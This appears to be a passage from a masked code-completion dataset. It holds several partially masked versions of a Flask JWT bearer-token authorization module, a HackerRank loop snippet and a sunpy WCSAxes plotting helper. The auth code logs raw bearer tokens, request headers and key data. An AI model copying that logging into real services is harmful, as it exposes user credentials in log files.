self.blacklist_token_repo = app_context.blacklist_token_repo
self.payload = user_service.decode_auth_token(access_token, get_jwk())
def check_is_blacklisted(self):
        is_blacklisted_token = BlacklistToken.check_blacklist(self.access_token, self.blacklist_token_repo)
if is_blacklisted_token:
LOGGER.debug('Token blacklisted.')
raise AuthenticationError('Invalid token.')
return self
def check_username_claim(self):
if not self.payload.get('sub'):
LOGGER.debug('Token missing sub.')
raise AuthorizationError('Forbidden.')
return self
def check_user_exists(self, user):
if not user:
LOGGER.debug('Token user not found.')
raise AuthorizationError('Forbidden.')
return self
def check_has_permissions(self, user: User, permissions: list):
has_permissions = True
for permission in permissions:
if not user.role.has_permission(Permission.from_enum(permission)):
LOGGER.debug(f'Missing permission {permission}.')
has_permissions = False
LOGGER.debug(f'Required permissions: {permissions}')
if not has_permissions:
raise AuthorizationError('Forbidden.')
return self
@staticmethod
    def from_authorization_header(authorization_header: str, app_context: AppContext):
if not authorization_header:
LOGGER.debug('Authorization header not found.')
raise AuthenticationError('Invalid token.')
if 'Bearer ' not in authorization_header:
LOGGER.debug('Bearer token not found.')
raise AuthenticationError('Invalid token.')
access_token = authorization_header.split('Bearer')[1].strip()
LOGGER.debug(f'Bearer token is:\n"{access_token}"')
return BearerTokenValidator(access_token, app_context)
def should_skip_auth(flask_request):
"""
Return true if should skip auth, e.g. when method is OPTIONS like when performing a React request.
:param flask_request: Flask request.
:return:
"""
return flask_request.method in ['HEAD', 'OPTIONS']
<mask token>
class ExceptionHandlers:
def __init__(self, app):
@app.errorhandler(AuthorizationError)
def handle_authorization_exception(e):
"""Return403 forbidden."""
return jsonify(str(e)), 403
@app.errorhandler(AuthenticationError)
def handle_authentication_exception(e):
"""Return401 authentication error."""
return jsonify(str(e)), 401
@lru_cache()
def jwk_key():
    jwk_path = os.environ.get('jwk_private_key_path') or app_context().config['jwk_private_key_path']
with open(jwk_path, 'rb') as f:
key = JsonWebKey.import_key(f.read())
return key
def new_token(payload: dict):
key = jwk_key()
header = {'alg': 'RS256', 'kid': 'demo_key'}
token = jwt.encode(header, payload, key)
LOGGER.debug(token)
return token.decode('utf-8')
def issue_token_for_user(user: User):
    access_token = new_token({
        'iss': 'lorem.ipsum.dev',
        'aud': 'lorem.ipsum.auth',
        'sub': user.username,
        'email': user.email,
        'roles': [user.role.name],
        'exp': datetime.datetime.now(tz=datetime.timezone.utc) + datetime.timedelta(hours=4),
        'iat': datetime.datetime.now(tz=datetime.timezone.utc)})
return access_token
| <mask token>
LOGGER = logging.getLogger('lorem-ipsum')
def app_context():
if 'app_context' not in g:
g.app_context = lorem_ipsum.create_app_context()
return g.app_context
@lru_cache()
def get_jwk():
LOGGER.debug('Loading jwk from public key...')
key_data = None
with open(app_context().config['jwk_public_key_path'], 'rb') as _key_file:
key_data = _key_file.read()
LOGGER.debug(key_data)
key = JsonWebKey.import_key(key_data, {'kty': 'RSA'})
_jwks = {'keys': [{**key.as_dict(), 'kid': 'demo_key'}]}
LOGGER.debug(_jwks)
return _jwks
class AuthenticationError(ValueError):
pass
class AuthorizationError(ValueError):
pass
class BearerTokenValidator:
def __init__(self, access_token, app_context: AppContext):
self.access_token = access_token
user_service = app_context.user_service
self.blacklist_token_repo = app_context.blacklist_token_repo
self.payload = user_service.decode_auth_token(access_token, get_jwk())
def check_is_blacklisted(self):
        is_blacklisted_token = BlacklistToken.check_blacklist(self.access_token, self.blacklist_token_repo)
if is_blacklisted_token:
LOGGER.debug('Token blacklisted.')
raise AuthenticationError('Invalid token.')
return self
def check_username_claim(self):
if not self.payload.get('sub'):
LOGGER.debug('Token missing sub.')
raise AuthorizationError('Forbidden.')
return self
def check_user_exists(self, user):
if not user:
LOGGER.debug('Token user not found.')
raise AuthorizationError('Forbidden.')
return self
def check_has_permissions(self, user: User, permissions: list):
has_permissions = True
for permission in permissions:
if not user.role.has_permission(Permission.from_enum(permission)):
LOGGER.debug(f'Missing permission {permission}.')
has_permissions = False
LOGGER.debug(f'Required permissions: {permissions}')
if not has_permissions:
raise AuthorizationError('Forbidden.')
return self
@staticmethod
    def from_authorization_header(authorization_header: str, app_context: AppContext):
if not authorization_header:
LOGGER.debug('Authorization header not found.')
raise AuthenticationError('Invalid token.')
if 'Bearer ' not in authorization_header:
LOGGER.debug('Bearer token not found.')
raise AuthenticationError('Invalid token.')
access_token = authorization_header.split('Bearer')[1].strip()
LOGGER.debug(f'Bearer token is:\n"{access_token}"')
return BearerTokenValidator(access_token, app_context)
def should_skip_auth(flask_request):
"""
Return true if should skip auth, e.g. when method is OPTIONS like when performing a React request.
:param flask_request: Flask request.
:return:
"""
return flask_request.method in ['HEAD', 'OPTIONS']
def requires_permission(permissions: list):
def requires_permission_decorator(function):
def wrapper(*args, **kwargs):
LOGGER.info(f'Authorization...\n{request.headers}')
if should_skip_auth(request):
return jsonify('ok')
authorization_header = request.headers.get('Authorization')
context = app_context()
with context.transaction_manager.transaction:
                bearer_token_validator = (BearerTokenValidator
                                          .from_authorization_header(authorization_header, context)
                                          .check_is_blacklisted()
                                          .check_username_claim())
                user = context.user_repo.get(username=bearer_token_validator.payload['sub'])
                bearer_token_validator.check_user_exists(user).check_has_permissions(user, permissions)
g.access_token = bearer_token_validator.access_token
g.user = user
_result = function(*args, **kwargs)
return _result
wrapper.__name__ = function.__name__
return wrapper
return requires_permission_decorator
class ExceptionHandlers:
def __init__(self, app):
@app.errorhandler(AuthorizationError)
def handle_authorization_exception(e):
"""Return403 forbidden."""
return jsonify(str(e)), 403
@app.errorhandler(AuthenticationError)
def handle_authentication_exception(e):
"""Return401 authentication error."""
return jsonify(str(e)), 401
@lru_cache()
def jwk_key():
    jwk_path = os.environ.get('jwk_private_key_path') or app_context().config['jwk_private_key_path']
with open(jwk_path, 'rb') as f:
key = JsonWebKey.import_key(f.read())
return key
def new_token(payload: dict):
key = jwk_key()
header = {'alg': 'RS256', 'kid': 'demo_key'}
token = jwt.encode(header, payload, key)
LOGGER.debug(token)
return token.decode('utf-8')
def issue_token_for_user(user: User):
    access_token = new_token({
        'iss': 'lorem.ipsum.dev',
        'aud': 'lorem.ipsum.auth',
        'sub': user.username,
        'email': user.email,
        'roles': [user.role.name],
        'exp': datetime.datetime.now(tz=datetime.timezone.utc) + datetime.timedelta(hours=4),
        'iat': datetime.datetime.now(tz=datetime.timezone.utc)})
return access_token
| import datetime
import logging
import os
from functools import lru_cache
from authlib.jose import JsonWebKey, jwt
from flask import g, request, jsonify
from lorem_ipsum.model import User, AppContext
import lorem_ipsum
from lorem_ipsum.model import Permission, BlacklistToken
LOGGER = logging.getLogger('lorem-ipsum')
def app_context():
if 'app_context' not in g:
g.app_context = lorem_ipsum.create_app_context()
return g.app_context
@lru_cache()
def get_jwk():
LOGGER.debug('Loading jwk from public key...')
key_data = None
with open(app_context().config['jwk_public_key_path'], 'rb') as _key_file:
key_data = _key_file.read()
LOGGER.debug(key_data)
key = JsonWebKey.import_key(key_data, {'kty': 'RSA'})
_jwks = {'keys': [{**key.as_dict(), 'kid': 'demo_key'}]}
LOGGER.debug(_jwks)
return _jwks
class AuthenticationError(ValueError):
pass
class AuthorizationError(ValueError):
pass
class BearerTokenValidator:
def __init__(self, access_token, app_context: AppContext):
self.access_token = access_token
user_service = app_context.user_service
self.blacklist_token_repo = app_context.blacklist_token_repo
self.payload = user_service.decode_auth_token(access_token, get_jwk())
def check_is_blacklisted(self):
is_blacklisted_token = BlacklistToken.check_blacklist(self.access_token, self.blacklist_token_repo)
if is_blacklisted_token:
LOGGER.debug('Token blacklisted.')
raise AuthenticationError('Invalid token.')
return self
def check_username_claim(self):
if not self.payload.get('sub'):
LOGGER.debug('Token missing sub.')
raise AuthorizationError('Forbidden.')
return self
def check_user_exists(self, user):
if not user:
LOGGER.debug('Token user not found.')
raise AuthorizationError('Forbidden.')
return self
def check_has_permissions(self, user: User, permissions: list):
has_permissions = True
for permission in permissions:
if not user.role.has_permission(Permission.from_enum(permission)):
LOGGER.debug(f'Missing permission {permission}.')
has_permissions = False
LOGGER.debug(f'Required permissions: {permissions}')
if not has_permissions:
raise AuthorizationError('Forbidden.')
return self
@staticmethod
def from_authorization_header(authorization_header: str, app_context: AppContext):
if not authorization_header:
LOGGER.debug('Authorization header not found.')
raise AuthenticationError('Invalid token.')
if 'Bearer ' not in authorization_header:
LOGGER.debug('Bearer token not found.')
raise AuthenticationError('Invalid token.')
access_token = authorization_header.split('Bearer')[1].strip()
LOGGER.debug(f'Bearer token is:\n"{access_token}"')
return BearerTokenValidator(access_token, app_context)
def should_skip_auth(flask_request):
"""
Return true if should skip auth, e.g. when method is OPTIONS like when performing a React request.
:param flask_request: Flask request.
:return:
"""
return flask_request.method in ['HEAD', 'OPTIONS']
def requires_permission(permissions: list):
def requires_permission_decorator(function):
def wrapper(*args, **kwargs):
LOGGER.info(f'Authorization...\n{request.headers}')
if should_skip_auth(request):
return jsonify('ok')
authorization_header = request.headers.get('Authorization')
context = app_context()
with context.transaction_manager.transaction:
bearer_token_validator = BearerTokenValidator.from_authorization_header(authorization_header, context) \
.check_is_blacklisted() \
.check_username_claim()
user = context.user_repo.get(username=bearer_token_validator.payload['sub'])
bearer_token_validator.check_user_exists(user) \
.check_has_permissions(user, permissions)
g.access_token = bearer_token_validator.access_token
g.user = user
_result = function(*args, **kwargs)
return _result
wrapper.__name__ = function.__name__
return wrapper
return requires_permission_decorator
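# Usage sketch (not part of the original module): the decorator wraps a Flask
# view so the whole Bearer-token check runs before the view body. The route,
# the permission enum value and the books_service attribute are hypothetical.
#
# @app.route('/books')
# @requires_permission([Permissions.BOOKS_READ])
# def list_books():
#     return jsonify(g.app_context.books_service.list_all())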
class ExceptionHandlers:
def __init__(self, app):
@app.errorhandler(AuthorizationError)
def handle_authorization_exception(e):
"""Return403 forbidden."""
return jsonify(str(e)), 403
@app.errorhandler(AuthenticationError)
def handle_authentication_exception(e):
"""Return401 authentication error."""
return jsonify(str(e)), 401
@lru_cache()
def jwk_key():
jwk_path = os.environ.get('jwk_private_key_path') or app_context().config['jwk_private_key_path']
with open(jwk_path, 'rb') as f:
key = JsonWebKey.import_key(f.read())
return key
def new_token(payload: dict):
key = jwk_key()
header = {'alg': 'RS256', 'kid': 'demo_key'}
token = jwt.encode(header, payload, key)
LOGGER.debug(token)
return token.decode('utf-8')
def issue_token_for_user(user: User):
access_token = new_token({
"iss": "lorem.ipsum.dev",
"aud": "lorem.ipsum.auth",
"sub": user.username,
"email": user.email,
"roles": [
user.role.name
],
"exp": datetime.datetime.now(tz=datetime.timezone.utc) + datetime.timedelta(hours=4),
"iat": datetime.datetime.now(tz=datetime.timezone.utc)
})
return access_token
| [
10,
12,
17,
19,
21
] |
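Row 604 reads its RSA key pair from `jwk_private_key_path`/`jwk_public_key_path` on disk. A self-contained sketch of the same authlib encode/decode flow, assuming `JsonWebKey.generate_key` to stand in for the key files; the claims and kid are illustrative, not the app's configuration.

```python
from authlib.jose import JsonWebKey, jwt

key = JsonWebKey.generate_key('RSA', 2048, is_private=True)  # stands in for the key files
header = {'alg': 'RS256', 'kid': 'demo_key'}
token = jwt.encode(header, {'iss': 'lorem.ipsum.dev', 'sub': 'alice'}, key)

claims = jwt.decode(token, key.as_dict(is_private=False))  # verify with the public half
claims.validate()
print(claims['sub'])  # alice
```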
605 | eb90912d09fca52a43b28ec4c988e3658ddfc219 | # Question link: https://www.hackerrank.com/challenges/30-scope/problem
# Code section:
def computeDifference(self):
# Add your code here
self.maximumDifference = -111111
for i in range(0,len(self.__elements)-1):
for j in range(i+1, len(self.__elements)):
diff = abs(self.__elements[i]-self.__elements[j])
self.maximumDifference = max(diff, self.maximumDifference)
| null | null | null | null | [
0
] |
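Row 605's nested loops compare every pair, which is O(n^2). The largest absolute difference between any two elements is just max minus min, so a single pass suffices; a sketch equivalent to `computeDifference` above:

```python
def compute_difference(elements):
    # max(|a - b|) over all pairs is always max(elements) - min(elements)
    return max(elements) - min(elements)

print(compute_difference([1, 2, 5]))  # 4
```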
606 | be1ef0aa3868985bf198781ee827bd447588df15 | <mask token>
def is_wcsaxes(axes):
"""
Tests a `matplotlib.axes.Axes` object to see if it is an instance of
`~astropy.visualization.wcsaxes.WCSAxes`.
Parameters
----------
axes : `matplotlib.axes`
Axes to test.
Returns
-------
`bool`
Result of the test.
"""
return isinstance(axes, wcsaxes.WCSAxes)
def gca_wcs(wcs, fig=None, slices=None):
"""
Get the current axes, or create a new `~astropy.visualization.wcsaxes.WCSAxes`
if ``fig`` has no axes.
Parameters
----------
wcs : `astropy.wcs.WCS`
A `~astropy.wcs.WCS` object used to create a new axes.
fig : `matplotlib.figure.Figure`
The figure in which to check for the axes. If ``None``, the current
figure is used (or a new one created if there are no current figures).
slices : `tuple`
``slices`` is passed to `~astropy.visualization.wcsaxes.WCSAxes` to describe
which two dimensions of the `~astropy.wcs.WCS` object are being plotted.
This slices the multidimensional wcs object in the way it needs to be sliced.
Returns
-------
`matplotlib.axes.Axes` or `~astropy.visualization.wcsaxes.WCSAxes`
The current axes, or a new one if created.
"""
if not fig:
fig = plt.gcf()
if not len(fig.get_axes()):
ax = plt.axes(projection=wcs, slices=slices)
else:
ax = plt.gca()
return ax
<mask token>
def default_wcs_grid(axes):
"""
Apply some default `~astropy.visualization.wcsaxes.WCSAxes` grid
formatting.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to draw the world
coordinate grid on.
"""
axes.coords.grid(color='white', alpha=0.6, linestyle='dotted',
linewidth=0.5)
@u.quantity_input
def wcsaxes_heliographic_overlay(axes, grid_spacing: u.deg = 10 * u.deg, annotate=True,
                                 obstime=None, rsun=None, observer=None,
                                 system='stonyhurst', **kwargs):
"""
Create a heliographic overlay using
`~astropy.visualization.wcsaxes.WCSAxes`.
Will draw a grid and label the top axes.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to create the overlay on.
grid_spacing: `~astropy.units.Quantity`
Spacing for longitude and latitude grid in degrees.
annotate : `bool`
Passing `False` disables the axes labels and the ticks on the top and right axes.
obstime : `~astropy.time.Time`
The ``obstime`` to use for the grid coordinate frame.
rsun : `~astropy.units.Quantity`
The ``rsun`` to use for the grid coordinate frame.
observer : `~astropy.coordinates.SkyCoord`
The ``observer`` to use for the grid coordinate frame. Only used for
Carrington coordinates.
system : str
Coordinate system for the grid. Must be 'stonyhurst' or 'carrington'.
If 'carrington', the ``observer`` keyword argument must be specified.
kwargs :
Additional keyword arguments are passed to
:meth:`astropy.visualization.wcsaxes.CoordinateHelper.grid`.
Returns
-------
`~astropy.visualization.wcsaxes.WCSAxes`
The overlay object.
Notes
-----
Keywords are passed to `~astropy.visualization.wcsaxes.coordinates_map.CoordinatesMap.grid`.
"""
    if isinstance(grid_spacing, u.Quantity) and grid_spacing.size == 1:
        lon_space = lat_space = grid_spacing
    elif grid_spacing.size == 2:
        lon_space, lat_space = grid_spacing
    else:
        raise ValueError('grid_spacing must be a Quantity of length one or two.')
    if system == 'stonyhurst':
        overlay = axes.get_coords_overlay(HeliographicStonyhurst(obstime=obstime, rsun=rsun))
    elif system == 'carrington':
        overlay = axes.get_coords_overlay(HeliographicCarrington(obstime=obstime, observer=observer, rsun=rsun))
    else:
        raise ValueError(f"system must be 'stonyhurst' or 'carrington' (got '{system}')")
c1, c2 = axes.coords
c1.set_ticks_position('bl')
c2.set_ticks_position('bl')
lon = overlay[0]
lat = overlay[1]
if Version(astropy_version) >= Version('5.3.dev'):
lon.coord_wrap = 180 * u.deg
else:
lon.coord_wrap = 180
lon.set_major_formatter('dd')
if annotate:
lon.set_axislabel(f'{system.capitalize()} Longitude', minpad=0.8)
lat.set_axislabel(f'{system.capitalize()} Latitude', minpad=0.9)
lon.set_ticks_position('tr')
lat.set_ticks_position('tr')
else:
lat.set_ticks_visible(False)
lon.set_ticks_visible(False)
lat.set_ticklabel_visible(False)
lon.set_ticklabel_visible(False)
grid_kw = {'color': 'white', 'zorder': 100, 'alpha': 0.5}
grid_kw.update(kwargs)
tick_color = grid_kw['color'] if 'color' in kwargs else 'k'
lon.set_ticks(spacing=lon_space, color=tick_color)
lat.set_ticks(spacing=lat_space, color=tick_color)
overlay.grid(**grid_kw)
if axes.title:
x, y = axes.title.get_position()
axes.title.set_position([x, y + 0.08])
return overlay
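A hedged usage sketch for the overlay function above, following the standard sunpy map-plotting pattern; `AIA_IMAGE` is sunpy's bundled sample file and fetching it triggers a one-time download.

```python
import astropy.units as u
import matplotlib.pyplot as plt
import sunpy.map
from sunpy.data.sample import AIA_IMAGE

aia = sunpy.map.Map(AIA_IMAGE)
ax = plt.subplot(projection=aia)
aia.plot(axes=ax)
wcsaxes_heliographic_overlay(ax, grid_spacing=15 * u.deg, obstime=aia.date,
                             rsun=aia.rsun_meters, color='blue')
plt.show()
```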
| <mask token>
def is_wcsaxes(axes):
"""
Tests a `matplotlib.axes.Axes` object to see if it is an instance of
`~astropy.visualization.wcsaxes.WCSAxes`.
Parameters
----------
axes : `matplotlib.axes`
Axes to test.
Returns
-------
`bool`
Result of the test.
"""
return isinstance(axes, wcsaxes.WCSAxes)
def gca_wcs(wcs, fig=None, slices=None):
"""
Get the current axes, or create a new `~astropy.visualization.wcsaxes.WCSAxes`
if ``fig`` has no axes.
Parameters
----------
wcs : `astropy.wcs.WCS`
A `~astropy.wcs.WCS` object used to create a new axes.
fig : `matplotlib.figure.Figure`
The figure in which to check for the axes. If ``None``, the current
figure is used (or a new one created if there are no current figures).
slices : `tuple`
``slices`` is passed to `~astropy.visualization.wcsaxes.WCSAxes` to describe
which two dimensions of the `~astropy.wcs.WCS` object are being plotted.
This slices the multidimensional wcs object in the way it needs to be sliced.
Returns
-------
`matplotlib.axes.Axes` or `~astropy.visualization.wcsaxes.WCSAxes`
The current axes, or a new one if created.
"""
if not fig:
fig = plt.gcf()
if not len(fig.get_axes()):
ax = plt.axes(projection=wcs, slices=slices)
else:
ax = plt.gca()
return ax
def get_world_transform(axes):
"""
Get the transformation to world coordinates.
If the axes is a `~astropy.visualization.wcsaxes.WCSAxes` instance this
returns the transform to the "world" coordinates, otherwise it returns
the transform to the matplotlib data coordinates, which are assumed to be in
world coordinates.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes` or `~matplotlib.axes.Axes`
The axes to get the transform from.
Returns
-------
`~matplotlib.transforms.CompositeGenericTransform`
The transformation object.
"""
if is_wcsaxes(axes):
transform = axes.get_transform('world')
else:
transform = axes.transData
return transform
def default_wcs_grid(axes):
"""
Apply some default `~astropy.visualization.wcsaxes.WCSAxes` grid
formatting.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to draw the world
coordinate grid on.
"""
axes.coords.grid(color='white', alpha=0.6, linestyle='dotted',
linewidth=0.5)
@u.quantity_input
def wcsaxes_heliographic_overlay(axes, grid_spacing: u.deg = 10 * u.deg, annotate=True,
                                 obstime=None, rsun=None, observer=None,
                                 system='stonyhurst', **kwargs):
"""
Create a heliographic overlay using
`~astropy.visualization.wcsaxes.WCSAxes`.
Will draw a grid and label the top axes.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to create the overlay on.
grid_spacing: `~astropy.units.Quantity`
Spacing for longitude and latitude grid in degrees.
annotate : `bool`
Passing `False` disables the axes labels and the ticks on the top and right axes.
obstime : `~astropy.time.Time`
The ``obstime`` to use for the grid coordinate frame.
rsun : `~astropy.units.Quantity`
The ``rsun`` to use for the grid coordinate frame.
observer : `~astropy.coordinates.SkyCoord`
The ``observer`` to use for the grid coordinate frame. Only used for
Carrington coordinates.
system : str
Coordinate system for the grid. Must be 'stonyhurst' or 'carrington'.
If 'carrington', the ``observer`` keyword argument must be specified.
kwargs :
Additional keyword arguments are passed to
:meth:`astropy.visualization.wcsaxes.CoordinateHelper.grid`.
Returns
-------
`~astropy.visualization.wcsaxes.WCSAxes`
The overlay object.
Notes
-----
Keywords are passed to `~astropy.visualization.wcsaxes.coordinates_map.CoordinatesMap.grid`.
"""
    if isinstance(grid_spacing, u.Quantity) and grid_spacing.size == 1:
        lon_space = lat_space = grid_spacing
    elif grid_spacing.size == 2:
        lon_space, lat_space = grid_spacing
    else:
        raise ValueError('grid_spacing must be a Quantity of length one or two.')
    if system == 'stonyhurst':
        overlay = axes.get_coords_overlay(HeliographicStonyhurst(obstime=obstime, rsun=rsun))
    elif system == 'carrington':
        overlay = axes.get_coords_overlay(HeliographicCarrington(obstime=obstime, observer=observer, rsun=rsun))
    else:
        raise ValueError(f"system must be 'stonyhurst' or 'carrington' (got '{system}')")
c1, c2 = axes.coords
c1.set_ticks_position('bl')
c2.set_ticks_position('bl')
lon = overlay[0]
lat = overlay[1]
if Version(astropy_version) >= Version('5.3.dev'):
lon.coord_wrap = 180 * u.deg
else:
lon.coord_wrap = 180
lon.set_major_formatter('dd')
if annotate:
lon.set_axislabel(f'{system.capitalize()} Longitude', minpad=0.8)
lat.set_axislabel(f'{system.capitalize()} Latitude', minpad=0.9)
lon.set_ticks_position('tr')
lat.set_ticks_position('tr')
else:
lat.set_ticks_visible(False)
lon.set_ticks_visible(False)
lat.set_ticklabel_visible(False)
lon.set_ticklabel_visible(False)
grid_kw = {'color': 'white', 'zorder': 100, 'alpha': 0.5}
grid_kw.update(kwargs)
tick_color = grid_kw['color'] if 'color' in kwargs else 'k'
lon.set_ticks(spacing=lon_space, color=tick_color)
lat.set_ticks(spacing=lat_space, color=tick_color)
overlay.grid(**grid_kw)
if axes.title:
x, y = axes.title.get_position()
axes.title.set_position([x, y + 0.08])
return overlay
| <mask token>
__all__ = ['is_wcsaxes', 'gca_wcs', 'get_world_transform',
'default_wcs_grid', 'wcsaxes_heliographic_overlay']
def is_wcsaxes(axes):
"""
Tests a `matplotlib.axes.Axes` object to see if it is an instance of
`~astropy.visualization.wcsaxes.WCSAxes`.
Parameters
----------
axes : `matplotlib.axes`
Axes to test.
Returns
-------
`bool`
Result of the test.
"""
return isinstance(axes, wcsaxes.WCSAxes)
def gca_wcs(wcs, fig=None, slices=None):
"""
Get the current axes, or create a new `~astropy.visualization.wcsaxes.WCSAxes`
if ``fig`` has no axes.
Parameters
----------
wcs : `astropy.wcs.WCS`
A `~astropy.wcs.WCS` object used to create a new axes.
fig : `matplotlib.figure.Figure`
The figure in which to check for the axes. If ``None``, the current
figure is used (or a new one created if there are no current figures).
slices : `tuple`
``slices`` is passed to `~astropy.visualization.wcsaxes.WCSAxes` to describe
which two dimensions of the `~astropy.wcs.WCS` object are being plotted.
This slices the multidimensional wcs object in the way it needs to be sliced.
Returns
-------
`matplotlib.axes.Axes` or `~astropy.visualization.wcsaxes.WCSAxes`
The current axes, or a new one if created.
"""
if not fig:
fig = plt.gcf()
if not len(fig.get_axes()):
ax = plt.axes(projection=wcs, slices=slices)
else:
ax = plt.gca()
return ax
def get_world_transform(axes):
"""
Get the transformation to world coordinates.
If the axes is a `~astropy.visualization.wcsaxes.WCSAxes` instance this
returns the transform to the "world" coordinates, otherwise it returns
the transform to the matplotlib data coordinates, which are assumed to be in
world coordinates.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes` or `~matplotlib.axes.Axes`
The axes to get the transform from.
Returns
-------
`~matplotlib.transforms.CompositeGenericTransform`
The transformation object.
"""
if is_wcsaxes(axes):
transform = axes.get_transform('world')
else:
transform = axes.transData
return transform
def default_wcs_grid(axes):
"""
Apply some default `~astropy.visualization.wcsaxes.WCSAxes` grid
formatting.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to draw the world
coordinate grid on.
"""
axes.coords.grid(color='white', alpha=0.6, linestyle='dotted',
linewidth=0.5)
@u.quantity_input
def wcsaxes_heliographic_overlay(axes, grid_spacing: u.deg = 10 * u.deg, annotate=True,
                                 obstime=None, rsun=None, observer=None,
                                 system='stonyhurst', **kwargs):
"""
Create a heliographic overlay using
`~astropy.visualization.wcsaxes.WCSAxes`.
Will draw a grid and label the top axes.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to create the overlay on.
grid_spacing: `~astropy.units.Quantity`
Spacing for longitude and latitude grid in degrees.
annotate : `bool`
Passing `False` disables the axes labels and the ticks on the top and right axes.
obstime : `~astropy.time.Time`
The ``obstime`` to use for the grid coordinate frame.
rsun : `~astropy.units.Quantity`
The ``rsun`` to use for the grid coordinate frame.
observer : `~astropy.coordinates.SkyCoord`
The ``observer`` to use for the grid coordinate frame. Only used for
Carrington coordinates.
system : str
Coordinate system for the grid. Must be 'stonyhurst' or 'carrington'.
If 'carrington', the ``observer`` keyword argument must be specified.
kwargs :
Additional keyword arguments are passed to
:meth:`astropy.visualization.wcsaxes.CoordinateHelper.grid`.
Returns
-------
`~astropy.visualization.wcsaxes.WCSAxes`
The overlay object.
Notes
-----
Keywords are passed to `~astropy.visualization.wcsaxes.coordinates_map.CoordinatesMap.grid`.
"""
if isinstance(grid_spacing, u.Quantity) and grid_spacing.size == 1:
lon_space = lat_space = grid_spacing
elif grid_spacing.size == 2:
lon_space, lat_space = grid_spacing
else:
raise ValueError(
'grid_spacing must be a Quantity of length one or two.')
if system == 'stonyhurst':
overlay = axes.get_coords_overlay(HeliographicStonyhurst(obstime=
obstime, rsun=rsun))
elif system == 'carrington':
overlay = axes.get_coords_overlay(HeliographicCarrington(obstime=
obstime, observer=observer, rsun=rsun))
else:
raise ValueError(
f"system must be 'stonyhurst' or 'carrington' (got '{system}')")
c1, c2 = axes.coords
c1.set_ticks_position('bl')
c2.set_ticks_position('bl')
lon = overlay[0]
lat = overlay[1]
if Version(astropy_version) >= Version('5.3.dev'):
lon.coord_wrap = 180 * u.deg
else:
lon.coord_wrap = 180
lon.set_major_formatter('dd')
if annotate:
lon.set_axislabel(f'{system.capitalize()} Longitude', minpad=0.8)
lat.set_axislabel(f'{system.capitalize()} Latitude', minpad=0.9)
lon.set_ticks_position('tr')
lat.set_ticks_position('tr')
else:
lat.set_ticks_visible(False)
lon.set_ticks_visible(False)
lat.set_ticklabel_visible(False)
lon.set_ticklabel_visible(False)
grid_kw = {'color': 'white', 'zorder': 100, 'alpha': 0.5}
grid_kw.update(kwargs)
tick_color = grid_kw['color'] if 'color' in kwargs else 'k'
lon.set_ticks(spacing=lon_space, color=tick_color)
lat.set_ticks(spacing=lat_space, color=tick_color)
overlay.grid(**grid_kw)
if axes.title:
x, y = axes.title.get_position()
axes.title.set_position([x, y + 0.08])
return overlay
| <mask token>
import matplotlib.pyplot as plt
from packaging.version import Version
import astropy.units as u
from astropy import __version__ as astropy_version
from astropy.visualization import wcsaxes
from sunpy.coordinates import HeliographicCarrington, HeliographicStonyhurst
__all__ = ['is_wcsaxes', 'gca_wcs', 'get_world_transform',
'default_wcs_grid', 'wcsaxes_heliographic_overlay']
def is_wcsaxes(axes):
"""
Tests a `matplotlib.axes.Axes` object to see if it is an instance of
`~astropy.visualization.wcsaxes.WCSAxes`.
Parameters
----------
axes : `matplotlib.axes`
Axes to test.
Returns
-------
`bool`
Result of the test.
"""
return isinstance(axes, wcsaxes.WCSAxes)
def gca_wcs(wcs, fig=None, slices=None):
"""
Get the current axes, or create a new `~astropy.visualization.wcsaxes.WCSAxes`
if ``fig`` has no axes.
Parameters
----------
wcs : `astropy.wcs.WCS`
A `~astropy.wcs.WCS` object used to create a new axes.
fig : `matplotlib.figure.Figure`
The figure in which to check for the axes. If ``None``, the current
figure is used (or a new one created if there are no current figures).
slices : `tuple`
``slices`` is passed to `~astropy.visualization.wcsaxes.WCSAxes` to describe
which two dimensions of the `~astropy.wcs.WCS` object are being plotted.
This slices the multidimensional wcs object in the way it needs to be sliced.
Returns
-------
`matplotlib.axes.Axes` or `~astropy.visualization.wcsaxes.WCSAxes`
The current axes, or a new one if created.
"""
if not fig:
fig = plt.gcf()
if not len(fig.get_axes()):
ax = plt.axes(projection=wcs, slices=slices)
else:
ax = plt.gca()
return ax
def get_world_transform(axes):
"""
Get the transformation to world coordinates.
If the axes is a `~astropy.visualization.wcsaxes.WCSAxes` instance this
returns the transform to the "world" coordinates, otherwise it returns
the transform to the matplotlib data coordinates, which are assumed to be in
world coordinates.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes` or `~matplotlib.axes.Axes`
The axes to get the transform from.
Returns
-------
`~matplotlib.transforms.CompositeGenericTransform`
The transformation object.
"""
if is_wcsaxes(axes):
transform = axes.get_transform('world')
else:
transform = axes.transData
return transform
def default_wcs_grid(axes):
"""
Apply some default `~astropy.visualization.wcsaxes.WCSAxes` grid
formatting.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to draw the world
coordinate grid on.
"""
axes.coords.grid(color='white', alpha=0.6, linestyle='dotted',
linewidth=0.5)
@u.quantity_input
def wcsaxes_heliographic_overlay(axes, grid_spacing: u.deg=10 * u.deg,
annotate=True, obstime=None, rsun=None, observer=None, system=
'stonyhurst', **kwargs):
"""
Create a heliographic overlay using
`~astropy.visualization.wcsaxes.WCSAxes`.
Will draw a grid and label the top axes.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to create the overlay on.
grid_spacing: `~astropy.units.Quantity`
Spacing for longitude and latitude grid in degrees.
annotate : `bool`
Passing `False` disables the axes labels and the ticks on the top and right axes.
obstime : `~astropy.time.Time`
The ``obstime`` to use for the grid coordinate frame.
rsun : `~astropy.units.Quantity`
